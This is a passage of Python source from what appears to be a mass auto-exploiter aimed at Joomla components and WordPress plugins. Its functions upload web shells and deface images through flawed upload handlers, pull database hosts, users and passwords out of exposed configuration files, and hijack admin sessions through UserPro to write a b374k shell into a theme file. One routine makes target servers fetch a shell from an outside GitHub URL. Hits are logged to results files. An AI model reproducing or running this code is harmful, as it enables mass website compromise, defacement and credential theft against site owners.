  740. GetConfig = requests.get(Exp, timeout=5)
  741. if 'JConfig' in GetConfig.text.encode('utf-8'):
  742. self.Print_vuln_Config(site)
  743. with open('result/Config_results.txt', 'a') as ww:
  744. ww.write('Full Config Path : ' + Exp + '\n')
  745. try:
  746. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
  747. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
  748. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
  749. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
  750. with open('result/Config_results.txt', 'a') as ww:
  751. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
  752. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n')
  753. except:
  754. self.Print_NotVuln('Com_CCkjseblod', site)
  755. else:
  756. self.Print_NotVuln('Com_CCkjseblod', site)
  757. except:
  758. self.Print_NotVuln('Com_CCkjseblod', site)
  759.  
  760. def Com_MyBlog(self, site):
  761. try:
  762. fileindex = {'fileToUpload': open(self.Jce_Deface_image, 'rb')}
  763. Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
  764. GoT = requests.post(Exp, files=fileindex, timeout=5)
  765. if 'success' or 'File exists' in GoT.text.encode('utf-8'):
  766. if '/images/pwn' in GoT.text.encode('utf-8'):
  767. IndeXpath = 'http://' + site + '/images/pwn.gif'
  768. else:
  769. try:
  770. GetPAth = re.findall("source: '(.*)'", GoT.text.encode('utf-8'))
  771. IndeXpath = GetPAth[0]
  772. except:
  773. IndeXpath = 'http://' + site + '/images/pwn.gif'
  774. CheckIndex = requests.get(IndeXpath, timeout=5)
  775. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  776. self.Print_Vuln_index(site + '/images/pwn.gif')
  777. with open('result/Index_results.txt', 'a') as writer:
  778. writer.write(IndeXpath + '\n')
  779. else:
  780. self.Print_NotVuln('Com_MyBlog', site)
  781. else:
  782. self.Print_NotVuln('Com_MyBlog', site)
  783. except:
  784. self.Print_NotVuln('Com_MyBlog', site)
  785.  
  786. def Com_Jdownloads_shell(self, site):
  787. try:
  788. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'), 'multipart/form-data'),
  789. 'pic_upload': (self.jdShell, open(self.jdShell, 'rb'), 'multipart/form-data')}
  790. post_data = {
  791. 'name': 'ur name',
  792. 'mail': 'TTTntsfT@aa.com',
  793. 'catlist': '1',
  794. 'filetitle': "lolz",
  795. 'description': "<p>zot</p>",
  796. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
  797. 'send': 1,
  798. 'senden': "Send file",
  799. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  800. 'option': "com_jdownloads",
  801. 'view': "upload"
  802. }
  803. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
  804. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  805. if '/upload_ok.png' in Got.text.encode('utf-8'):
  806. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.jdShell.split('/')[1]
  807. Check = requests.get(checkUrl, timeout=5)
  808. if 'Vuln!!' in Check.text:
  809. ChecksHell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  810. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  811. if 'Vuln!!' in ChecksHell.text.encode('utf-8'):
  812. self.Print_vuln_Shell(site + '/images/vuln.php')
  813. with open('result/Shell_results.txt', 'a') as writer:
  814. writer.write(site + '/images/vuln.php' + '\n')
  815. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  816. self.Print_Vuln_index(site + '/vuln.htm')
  817. with open('result/Index_results.txt', 'a') as writer:
  818. writer.write(site + '/vuln.htm' + '\n')
  819. else:
  820. self.Com_Jdownloads(site)
  821. else:
  822. self.Com_Jdownloads(site)
  823. else:
  824. self.Com_Jdownloads(site)
  825. except:
  826. self.Com_Jdownloads(site)
  827.  
  828.  
  829. def Com_Jdownloads(self, site):
  830. try:
  831. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'),'multipart/form-data'),
  832. 'pic_upload': (self.Jce_Deface_image, open(self.Jce_Deface_image, 'rb'), 'multipart/form-data')}
  833. post_data = {
  834. 'name': 'ur name',
  835. 'mail': 'TTTnstT@aa.com',
  836. 'catlist': '1',
  837. 'filetitle': "lolz",
  838. 'description': "<p>zot</p>",
  839. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
  840. 'send': 1,
  841. 'senden': "Send file",
  842. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  843. 'option': "com_jdownloads",
  844. 'view': "upload"
  845. }
  846. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
  847. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  848. if '/upload_ok.png' in Got.text.encode('utf-8'):
  849. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.Jce_Deface_image.split('/')[1]
  850. Check = requests.get(checkUrl, timeout=5)
  851. if 'GIF89a' in Check.text:
  852. self.Print_Vuln_index(site + '/images/jdownloads/screenshots/' +
  853. self.Jce_Deface_image.split('/')[1])
  854. with open('result/Index_results.txt', 'a') as writer:
  855. writer.write(checkUrl + '\n')
  856. else:
  857. self.Print_NotVuln('Com_Jdownloads', site)
  858. else:
  859. self.Print_NotVuln('Com_Jdownloads', site)
  860. except:
  861. self.Print_NotVuln('Com_Jdownloads', site)
  862.  
  863.  
  864. def Com_Fabric(self, site):
  865. try:
  866. fileindex = {'userfile': (self.TextindeX, open(self.TextindeX, 'rb'), 'multipart/form-data')}
  867. post_data = {
  868. "name": "me.php",
  869. "drop_data": "1",
  870. "overwrite": "1",
  871. "field_delimiter": ",",
  872. "text_delimiter": "&quot;",
  873. "option": "com_fabrik",
  874. "controller": "import",
  875. "view": "import",
  876. "task": "doimport",
  877. "Itemid": "0",
  878. "tableid": "0"
  879. }
  880. Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
  881. requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  882. Check = requests.get('http://' + site + '/media/' + self.TextindeX.split('/')[1])
  883. if 'Vuln!!' in Check.text:
  884. self.Print_Vuln_index(site + '/media/' + self.TextindeX.split('/')[1])
  885. with open('result/Index_results.txt', 'a') as writer:
  886. writer.write(site + '/media/' + self.TextindeX.split('/')[1] + '\n')
  887. else:
  888. self.Print_NotVuln('Com_Fabric', site)
  889. except:
  890. self.Print_NotVuln('Com_Fabric', site)
  891.  
  892.  
  893. def Com_AdsManager(self, site):
  894. try:
  895. fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
  896. post_data = {"name": self.Jce_Deface_image.split('/')[1]}
  897. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  898. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  899. if '"jsonrpc"' in GoT.text.encode('utf-8'):
  900. Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
  901. if 'GIF89a' in Check.text.encode('utf-8'):
  902. self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
  903. with open('result/Index_results.txt', 'a') as writer:
  904. writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
  905. else:
  906. self.Print_NotVuln('Com_AdsManager', site)
  907. except:
  908. self.Print_NotVuln('Com_AdsManager', site)
  909.  
  910. def Com_AdsManager_Shell(self, site):
  911. try:
  912. fileindex = {'file': open(self.indeX, 'rb')}
  913. post_data = {"name": "vuln.php"}
  914. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  915. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  916. if '"jsonrpc"' in GoT.text.encode('utf-8'):
  917. requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
  918. requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
  919. Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
  920. Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
  921. Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
  922. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  923. CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  924.  
  925. if 'Vuln!!' in Check.text.encode('utf-8'):
  926. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  927. self.Print_vuln_Shell(site + '/images/vuln.php')
  928. with open('result/Shell_results.txt', 'a') as writer:
  929. writer.write(site + '/images/vuln.php' + '\n')
  930. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  931. self.Print_Vuln_index(site + '/vuln.htm')
  932. with open('result/Index_results.txt', 'a') as writer:
  933. writer.write(site + '/vuln.htm' + '\n')
  934. else:
  935. self.Com_AdsManager(site)
  936. elif 'Vuln!!' in Check2.text.encode('utf-8'):
  937. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  938. self.Print_vuln_Shell(site + '/images/vuln.php')
  939. with open('result/Shell_results.txt', 'a') as writer:
  940. writer.write(site + '/images/vuln.php' + '\n')
  941. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  942. self.Print_Vuln_index(site + '/vuln.htm')
  943. with open('result/Index_results.txt', 'a') as writer:
  944. writer.write(site + '/vuln.htm' + '\n')
  945. else:
  946. self.Com_AdsManager(site)
  947. elif 'Vuln!!' in Check3.text.encode('utf-8'):
  948. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  949. self.Print_vuln_Shell(site + '/images/vuln.php')
  950. with open('result/Shell_results.txt', 'a') as writer:
  951. writer.write(site + '/images/vuln.php' + '\n')
  952. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  953. self.Print_Vuln_index(site + '/vuln.htm')
  954. with open('result/Index_results.txt', 'a') as writer:
  955. writer.write(site + '/vuln.htm' + '\n')
  956. else:
  957. self.Com_AdsManager(site)
  958. else:
  959. self.Com_AdsManager(site)
  960. except:
  961. self.Com_AdsManager(site)
  962.  
  963. def JCE_shell(self, site):
  964. try:
  965. fileShell = {'Filedata': open(self._shell, 'rb')}
  966. post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
  967. Exp = 'http://' + site +\
  968. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
  969. Post = requests.post(Exp, files=fileShell, data=post_data, timeout=5)
  970. OtherMethod = '"text":"' + self._shell.split('/')[1] + '"'
  971. if OtherMethod in Post.text.encode('utf-8'):
  972. PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + self._shell.split('/')[1]
  973. + "\",\"./../../images/vuln.php\"]}"}
  974. try:
  975. privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
  976. 'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
  977. requests.post(privExploit, data=PrivMethod, timeout=5)
  978. try:
  979. VulnCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  980. if 'Vuln!!' in VulnCheck.text:
  981. self.Print_vuln_Shell(site + '/images/vuln.php')
  982. with open('result/Shell_results.txt', 'a') as writer:
  983. writer.write(site + '/images/vuln.php' + '\n')
  984. self.Jce_Test(site)
  985. else:
  986. self.Jce_Test(site)
  987. except:
  988. self.Jce_Test(site)
  989. except:
  990. self.Jce_Test(site)
  991.  
  992. else:
  993. self.Jce_Test(site)
  994. except:
  995. self.Jce_Test(site)
  996.  
  997. def Jce_Test(self, site):
  998. try:
  999. fileDeface = {'Filedata': open(self.Jce_Deface_image, 'rb')}
  1000. post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
  1001. Exp = 'http://' + site +\
  1002. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
  1003. Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5)
  1004. OtherMethod = '"text":"' + self.Jce_Deface_image.split('/')[1] + '"'
  1005. if OtherMethod in Post.text.encode('utf-8'):
  1006. self.Print_Vuln_index(site + '/' + self.Jce_Deface_image.split('/')[1])
  1007. with open('result/Index_results.txt', 'a') as writer:
  1008. writer.write(site + '/' + self.Jce_Deface_image.split('/')[1] + '\n')
  1009. elif OtherMethod not in Post.text.encode('utf-8'):
  1010. post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
  1011. Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5)
  1012. if OtherMethod in Post.text.encode('utf-8'):
  1013. self.Print_Vuln_index(site + '/images/' + self.Jce_Deface_image.split('/')[1])
  1014. with open('result/Index_results.txt', 'a') as writer:
  1015. writer.write(site + '/images/' + self.Jce_Deface_image.split('/')[1] + '\n')
  1016. else:
  1017. self.Print_NotVuln('Com_JCE', site)
  1018. else:
  1019. self.Print_NotVuln('Com_JCE', site)
  1020. except:
  1021. self.Print_NotVuln('Com_JCE', site)
  1022.  
  1023.  
  1024. def alberghiExploit(self, site):
  1025. try:
  1026. fileDeface = {'userfile': open(self.Jce_Deface_image, 'rb')}
  1027. Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
  1028. Check = requests.get(Exp, timeout=5)
  1029. if 'class="inputbox" name="userfile"' in Check.text.encode('utf-8'):
  1030. Post = requests.post(Exp, files=fileDeface, timeout=5)
  1031. if 'has been successfully' or 'already exists' in Post.text.encode('utf-8'):
  1032. CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
  1033. self.Jce_Deface_image.split('/')[1], timeout=5)
  1034. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1035. with open('result/Index_results.txt', 'a') as writer:
  1036. writer.write(site + '/administrator/components/com_alberghi/' +
  1037. self.Jce_Deface_image.split('/')[1] + '\n')
  1038. self.Print_Vuln_index(site + '/administrator/components/com_alberghi/' +
  1039. self.Jce_Deface_image.split('/')[1])
  1040. else:
  1041. self.Print_NotVuln('com_alberghi', site)
  1042. else:
  1043. self.Print_NotVuln('com_alberghi', site)
  1044. else:
  1045. self.Print_NotVuln('com_alberghi', site)
  1046. except:
  1047. self.Print_NotVuln('com_alberghi', site)
  1048.  
  1049. def CateGory_page_icons(self, site):
  1050. try:
  1051. ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5)
  1052. if ChckVln.status_code == 200:
  1053. Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
  1054. fileDeface = {'wpdev-async-upload': open(self.Jce_Deface_image, 'rb')}
  1055. PostDAta = {'dir_icons': '../../../',
  1056. 'submit': 'upload'}
  1057. requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5)
  1058. CheckIndex = requests.get('http://' + site + '/wp-content/' + self.Jce_Deface_image.split('/')[1], timeout=5)
  1059. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1060. with open('result/Index_results.txt', 'a') as writer:
  1061. writer.write(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1] + '\n')
  1062. self.Print_Vuln_index(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1])
  1063. else:
  1064. self.Print_NotVuln('CateGory_page_icons', site)
  1065. else:
  1066. self.Print_NotVuln('CateGory_page_icons', site)
  1067. except:
  1068. self.Print_NotVuln('CateGory_page_icons', site)
  1069.  
  1070.  
  1071. def Downloads_Manager(self, site):
  1072. try:
  1073. Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=5)
  1074. if 'GIF89a' in Checkvuln.text.encode('utf-8'):
  1075. PostDAta = {'dm_upload': ''}
  1076. fileDeface = {'upfile': open(self.Jce_Deface_image, 'rb')}
  1077. fileShell = {'upfile': open(self.pagelinesExploitShell, 'rb')}
  1078. requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=5)
  1079. CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
  1080. self.Jce_Deface_image.split('/')[1])
  1081. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1082. requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=5)
  1083. requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
  1084. self.pagelinesExploitShell.split('/')[1], timeout=5)
  1085. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1086. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1087. self.Print_vuln_Shell(site + '/wp-content/plugins/downloads-manager/upload/' +
  1088. self.pagelinesExploitShell.split('/')[1])
  1089. self.Print_Vuln_index(site + '/vuln.htm')
  1090. with open('result/Shell_results.txt', 'a') as writer:
  1091. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
  1092. self.pagelinesExploitShell.split('/')[1] + '\n')
  1093. with open('result/Index_results.txt', 'a') as writer:
  1094. writer.write(site + '/vuln.htm' + '\n')
  1095. else:
  1096. self.Print_Vuln_index(site + '/wp-content/plugins/downloads-manager/upload/' +
  1097. self.Jce_Deface_image.split('/')[1])
  1098. with open('result/Index_results.txt', 'a') as writer:
  1099. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
  1100. self.Jce_Deface_image.split('/')[1] + '\n')
  1101. else:
  1102. self.Print_NotVuln('Downloads-Manager', site)
  1103. else:
  1104. self.Print_NotVuln('Downloads-Manager', site)
  1105. except:
  1106. self.Print_NotVuln('Downloads-Manager', site)
  1107.  
  1108. def GetWordpressPostId(self, zzz):
  1109. try:
  1110. PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5)
  1111. wsx = re.findall('"id":(.+?),"date"', PostId.text)
  1112. postid = wsx[1].strip()
  1113. return postid
  1114. except:
  1115. pass
  1116.  
  1117. def wp_content_injection(self, site):
  1118. try:
  1119. zaq = self.GetWordpressPostId(site)
  1120. headers = {'Content-Type': 'application/json'}
  1121. xxx = str(zaq) + 'bbx'
  1122. data = json.dumps({
  1123. 'content': '<h1>Vuln!! Path it now!!\n<p><title>Vuln!! Path it now!!<br />\n</title></p></h1>\n',
  1124. 'title': 'Vuln!! Path it now!!',
  1125. 'id': xxx,
  1126. 'link': '/x-htm/',
  1127. 'slug': '"/x-htm/"'
  1128. })
  1129. GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data, headers=headers, timeout=10)
  1130. if GoT:
  1131. CheckIndex = 'http://' + site + '/x.htm'
  1132. zcheck = requests.get(CheckIndex, timeout=10)
  1133. if 'Vuln!!' in zcheck.text:
  1134. self.Print_Vuln_index(site + '/x.htm')
  1135. with open('result/Index_results.txt', 'a') as writer:
  1136. writer.write(site + '/x.htm' + '\n')
  1137. else:
  1138. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
  1139. else:
  1140. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
  1141. except:
  1142. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
  1143.  
  1144. def Wp_Job_Manager(self, site):
  1145. try:
  1146. Exploit = '/jm-ajax/upload_file/'
  1147. CheckVuln = requests.get('http://' + site + Exploit, timeout=5)
  1148. if '"files":[]' in CheckVuln.text.encode('utf-8'):
  1149. try:
  1150. IndeXfile = {'file[]': open(self.Jce_Deface_image, 'rb')}
  1151. GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5)
  1152. GetIndeXpath = re.findall('"url":"(.*)"', GoT.text.encode('utf-8'))
  1153. IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
  1154. UploadedIndEX = site + '/wp-content' + IndeXpath
  1155. Checkindex = requests.get('http://' + UploadedIndEX, timeout=5)
  1156. if 'GIF89a' in Checkindex.text.encode('utf-8'):
  1157. self.Print_Vuln_index(UploadedIndEX)
  1158. with open('result/Index_results.txt', 'a') as writer:
  1159. writer.write(UploadedIndEX + '\n')
  1160. else:
  1161. self.Print_NotVuln('Wp-Job-Manager', site)
  1162. except:
  1163. self.Print_NotVuln('Wp-Job-Manager', site)
  1164. else:
  1165. self.Print_NotVuln('Wp-Job-Manager', site)
  1166. except:
  1167. self.Print_NotVuln('Wp-Job-Manager', site)
  1168.  
  1169.  
  1170. def wp_mobile_detector(self, site):
  1171. try:
  1172. ExploitShell = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
  1173. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/settings_auto.php'
  1174. ExploitGifUpload = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
  1175. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/pwn.gif'
  1176.  
  1177. Ex = '/wp-content/plugins/wp-mobile-detector/resize.php'
  1178. GoT = requests.get('http://' + site + Ex, timeout=5)
  1179. if 'GIF89a' in GoT.text.encode('utf-8'):
  1180. requests.get('http://' + site + ExploitGifUpload)
  1181. requests.get('http://' + site + ExploitShell)
  1182. PathGif = '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif'
  1183. PathShell = '/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php'
  1184. Check1 = 'http://' + site + PathGif
  1185. Check2 = 'http://' + site + PathShell
  1186. CheckIndex = requests.get(Check1, timeout=5)
  1187. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1188. CheckShell = requests.get(Check2, timeout=5)
  1189. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1190. Xshell = requests.get("http://" + site + "/wp-content/vuln.php", timeout=5)
  1191. if 'Vuln!!' in Xshell.text.encode('utf-8'):
  1192. self.Print_vuln_Shell(site + "/wp-content/vuln.php")
  1193. with open('result/Shell_results.txt', 'a') as writer:
  1194. writer.write(site + "/wp-content/vuln.php" + '\n')
  1195. Xindex = requests.get("http://" + site + "/vuln.htm", timeout=5)
  1196. if 'Vuln!!' in Xindex.text.encode('utf-8'):
  1197. self.Print_Vuln_index(site + '/vuln.htm')
  1198. with open('result/Index_results.txt', 'a') as writer:
  1199. writer.write(site + '/vuln.htm' + '\n')
  1200. else:
  1201. self.Print_Vuln_index(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif')
  1202. with open('result/Index_results.txt', 'a') as writer:
  1203. writer.write(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif' + '\n')
  1204. else:
  1205. self.Print_NotVuln('wp-mobile-detector', site)
  1206. else:
  1207. self.Print_NotVuln('wp-mobile-detector', site)
  1208. except:
  1209. self.Print_NotVuln('wp-mobile-detector', site)
  1210.  
  1211. def get_WpNoncE(self, source):
  1212. try:
  1213. find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
  1214. path = find[0].strip()
  1215. return path
  1216. except:
  1217. pass
  1218.  
  1219. def get_WpFlag(self, source):
  1220. try:
  1221. find = re.findall('<option value="(.*?)" selected="selected">', source)
  1222. path = find[0].strip()
  1223. return path
  1224. except:
  1225. pass
  1226.  
  1227. def UserProExploit(self, site):
  1228. try:
  1229. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  1230. 'Accept': '*/*'}
  1231. exploit = '/?up_auto_log=true'
  1232. sess = requests.session()
  1233. admin_re_page = 'http://' + site + '/wp-admin/'
  1234. sess.get('http://' + site + exploit, timeout=10, headers=headers)
  1235. Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
  1236. if '<li id="wp-admin-bar-logout">' in Check_login.text:
  1237. with open('result/AdminTakeover_results.txt', 'a') as writer:
  1238. writer.write(site + exploit + '\n')
  1239. ___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
  1240. ___Get_edit = admin_re_page + 'theme-editor.php'
  1241. Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
  1242. source = Get_source.text
  1243. _Wp_FlaG = self.get_WpFlag(source)
  1244. _Wp_NoncE = self.get_WpNoncE(source)
  1245. __data = {'_wpnonce': _Wp_NoncE,
  1246. '_wp_http_referer': '/wp-admin/theme-editor.php?file=search.php',
  1247. 'newcontent': self.shell_code,
  1248. 'action': 'update',
  1249. 'file': 'search.php',
  1250. 'theme': _Wp_FlaG,
  1251. 'scrollto': '0',
  1252. 'docs-list': '',
  1253. 'submit': 'Update+File'}
  1254. sess.post(___Get_edit, data=__data, headers=headers)
  1255. shell_PaTh = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
  1256. Check_sHell = sess.get(shell_PaTh, headers=headers)
  1257. if 'wordpress_project' in Check_sHell.text:
  1258. __po = {'_upl': 'Upload'}
  1259. fil = {'file': open('Access.php', 'rb')}
  1260. requests.post(shell_PaTh, data=__po, files=fil)
  1261. shell_PaTh_DoNe = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
  1262. Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
  1263. if 'b374k' in Got_Shell.text:
  1264. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php")
  1265. with open('result/Shell_results.txt', 'a') as writer:
  1266. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php" + '\n')
  1267. else:
  1268. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php")
  1269. with open('result/Shell_results.txt', 'a') as writer:
  1270. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php" + '\n')
  1271. else:
  1272. self.Print_NotVuln('UserPro', site)
  1273. else:
  1274. self.Print_NotVuln('UserPro', site)
  1275. except:
  1276. self.Print_NotVuln('UserPro', site)
  1277.  
  1278.  
  1279. def formcraftExploit_Shell(self, site):
  1280. try:
  1281. ShellFile = {'files[]': open(self.pagelinesExploitShell, 'rb')}
  1282. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
  1283. Check = requests.get(Exp, timeout=5)
  1284. if '"failed"' in Check.text.encode('utf-8'):
  1285. GoT = requests.post(Exp, files=ShellFile, timeout=5)
  1286. if 'new_name' in GoT.text.encode('utf-8'):
  1287. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
  1288. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
  1289. + GetIndexName[0].split('"')[0]
  1290. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  1291. if CheckIndex.status_code == 200:
  1292. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1293. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1294. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1295. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1296. with open('result/Shell_results.txt', 'a') as writer:
  1297. writer.write(site + '/wp-content/vuln.php' + '\n')
  1298. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1299. self.Print_Vuln_index(site + '/vuln.htm')
  1300. with open('result/Index_results.txt', 'a') as writer:
  1301. writer.write(site + '/vuln.htm' + '\n')
  1302. else:
  1303. self.formcraftExploitIndeX(site)
  1304. else:
  1305. self.formcraftExploitIndeX(site)
  1306. else:
  1307. self.formcraftExploitIndeX(site)
  1308. else:
  1309. self.formcraftExploitIndeX(site)
  1310. except:
  1311. self.formcraftExploitIndeX(site)
  1312.  
  1313. def formcraftExploitIndeX(self, site):
  1314. try:
  1315. ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
  1316. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
  1317. Check = requests.get(Exp, timeout=5)
  1318. if '"failed"' in Check.text.encode('utf-8'):
  1319. GoT = requests.post(Exp, files=ShellFile, timeout=5)
  1320. if 'new_name' in GoT.text.encode('utf-8'):
  1321. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
  1322. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
  1323. + GetIndexName[0].split('"')[0]
  1324. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  1325. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1326. self.Print_Vuln_index(IndexPath)
  1327. with open('result/Index_results.txt', 'a') as writer:
  1328. writer.write(IndexPath + '\n')
  1329. else:
  1330. self.Print_NotVuln('formcraft', site)
  1331. else:
  1332. self.Print_NotVuln('formcraft', site)
  1333. else:
  1334. self.Print_NotVuln('formcraft', site)
  1335. except:
  1336. self.Print_NotVuln('formcraft', site)
  1337.  
  1338.  
  1339.  
  1340. def cherry_plugin(self, site):
  1341. try:
  1342. ShellFile = {'file': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
  1343. , 'multipart/form-data')}
  1344. Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
  1345. aa = requests.post(Exp, files=ShellFile, timeout=5)
  1346. Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
  1347. + self.pagelinesExploitShell.split('/')[1]
  1348. GoT = requests.get(Shell, timeout=5)
  1349. if GoT.status_code == 200:
  1350. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1351. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1352. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1353. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1354. with open('result/Shell_results.txt', 'a') as writer:
  1355. writer.write(site + '/wp-content/vuln.php' + '\n')
  1356. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1357. self.Print_Vuln_index(site + '/vuln.htm')
